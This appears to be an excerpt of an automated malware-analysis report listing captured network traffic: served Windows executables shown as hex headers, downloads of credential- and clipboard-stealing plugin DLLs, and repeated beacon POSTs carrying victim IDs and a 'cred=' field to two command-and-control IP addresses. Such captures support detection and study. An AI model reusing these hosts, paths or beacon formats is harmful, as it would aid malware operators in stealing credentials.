54 00 6d 00 6c 00 6d 00 64 00 48 00 6c 00 58 00 59 00 57 00 78 00 73 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 15:19:02 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 05:53:20 GMTETag: "4b400-6290c54e671ba"Accept-Ranges: bytesContent-Length: 308224Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 5c b7 69 25 3d d9 3a 25 3d d9 3a 25 3d d9 3a 2c 45 4a 3a 26 3d d9 3a 25 3d d8 3a 26 3d d9 3a 4a 4b 72 3a 2d 3d d9 3a 4a 4b 43 3a 24 3d d9 3a 4a 4b 44 3a 24 3d d9 3a 52 69 63 68 25 3d d9 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3c 7a 5a 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 3a 00 00 00 2a 00 00 00 00 00 00 5c 34 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 68 00 00 28 00 00 00 00 90 00 00 28 03 00 00 00 80 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb 39 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c8 18 00 00 00 50 00 00 00 1a 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 06 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 40 02 00 00 00 80 00 00 00 04 00 00 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 28 03 00 00 00 90 00 00 00 04 00 00 00 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 36 34 00 00 00 00 00 60 04 00 00 a0 00 00 00 54 04 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 15:19:04 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 07:53:47 GMTETag: "6bc00-6290e03a93110"Accept-Ranges: bytesContent-Length: 441344Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd b6 42 53 99 d7 2c 00 99 d7 2c 00 99 d7 2c 00 8d bc 2f 01 94 d7 2c 00 8d bc 29 01 23 d7 2c 00 cb a2 28 01 8b d7 2c 00 cb a2 2f 01 8f d7 2c 00 cb a2 29 01 c0 d7 2c 00 a8 8b d1 00 9b d7 2c 00 8d bc 28 01 8e d7 2c 00 8d bc 2d 01 8a d7 2c 00 99 d7 2d 00 6a d7 2c 00 55 a2 25 01 98 d7 2c 00 55 a2 d3 00 98 d7 2c 00 55 a2 2e 01 98 d7 2c 00 52 69 63 68 99 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8b 96 5a 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 fa 04 00 00 00 02 00 00 00 00 00 aa a6 02 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 07 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 46 06 00 c8 00 00 00 00 d0 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 d4 45 00 00 fc e1 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e3 05 00 18 00 00 00 38 e2 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 05 00 3c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7a f8 04 00 00 10 00 00 00 fa 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 49 01 00 00 10 05 00 00 4a 01 00 00 fe 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 6d 00 00 00 60 06 00 00 2c 00 00 00 48 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 d0 06 00 00 02 00 00 00 74 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 45 00 00 00 e0 06 00 00 46 00 00 00 76 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 15:20:06 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 18:53:38 GMTETag: "138c00-629173b693080"Accept-Ranges: bytesContent-Length: 1281024Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 86 e5 c9 44 c2 84 a7 17 c2 84 a7 17 c2 84 a7 17 d6 ef a3 16 d6 84 a7 17 d6 ef a4 16 d2 84 a7 17 d6 ef a2 16 73 84 a7 17 90 f1 a2 16 86 84 a7 17 90 f1 a3 16 cd 84 a7 17 90 f1 a4 16 c8 84 a7 17 d6 ef a6 16 cf 84 a7 17 c2 84 a6 17 01 84 a7 17 0e f1 ae 16 c6 84 a7 17 0e f1 a7 16 c3 84 a7 17 0e f1 58 17 c3 84 a7 17 0e f1 a5 16 c3 84 a7 17 52 69 63 68 c2 84 a7 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 82 96 5a 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 1d 00 c8 0f 00 00 38 04 00 00 00 00 00 c4 fa 0c 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 80 7e 12 00 58 00 00 00 d8 7e 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 9c ae 00 00 00 00 00 00 00 00 00 00 00 30 14 00 6c 12 00 00 00 95 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 95 11 00 38 01 00 00 00 00 00 00 00 00 00 00 00 e0 0f 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 c7 0f 00 00 10 00 00 00 c8 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9e b3 02 00 00 e0 0f 00 00 b4 02 00 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c bb 00 00 00 a0 12 00 00 44 00 00 00 80 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 9c ae 00 00 00 60 13 00 00 b0 00 00 00 c4 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 fc 00 00 00 00 10 14 00 00 02 00 00 00 74 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 76 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 12 00 00 00 30 14 00 00 14 00 00 00 78 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 15:20:13 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 18:53:40 GMTETag: "1f000-629173b87b500"Accept-Ranges: bytesContent-Length: 126976Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c8 f9 ef 50 8c 98 81 03 8c 98 81 03 8c 98 81 03 98 f3 82 02 86 98 81 03 98 f3 84 02 05 98 81 03 98 f3 85 02 9e 98 81 03 de ed 85 02 83 98 81 03 de ed 82 02 9d 98 81 03 de ed 84 02 ad 98 81 03 98 f3 80 02 8b 98 81 03 8c 98 80 03 ed 98 81 03 40 ed 88 02 8f 98 81 03 40 ed 81 02 8d 98 81 03 40 ed 7e 03 8d 98 81 03 40 ed 83 02 8d 98 81 03 52 69 63 68 8c 98 81 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 84 96 5a 67 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1d 00 44 01 00 00 b4 00 00 00 00 00 00 62 70 00 00 00 10 00 00 00 60 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 cd 01 00 9c 00 00 00 ac cd 01 00 50 00 00 00 00 00 02 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 f8 1a 00 00 84 bb 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 bb 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 06 43 01 00 00 10 00 00 00 44 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2a 75 00 00 00 60 01 00 00 76 00 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 1f 00 00 00 e0 01 00 00 14 00 00 00 be 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 00 02 00 00 02 00 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f8 1a 00 00 00 10 02 00 00 1c 00 00 00 d4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: GET /7vhfjke3/Plugins/cred64.dll HTTP/1.1Host: 185.81.68.147
                          Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                          Source: global trafficHTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                          Source: global trafficHTTP traffic detected: GET /7vhfjke3/Plugins/clip64.dll HTTP/1.1Host: 185.81.68.147
                          Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
                          Source: global trafficHTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
                          Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                          Source: global trafficHTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                          Source: global trafficHTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
                          Source: global trafficHTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
                          Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
                          Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
                          Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
                          Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
                          Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                          Source: global trafficHTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                          Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                          Source: global trafficHTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                          Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
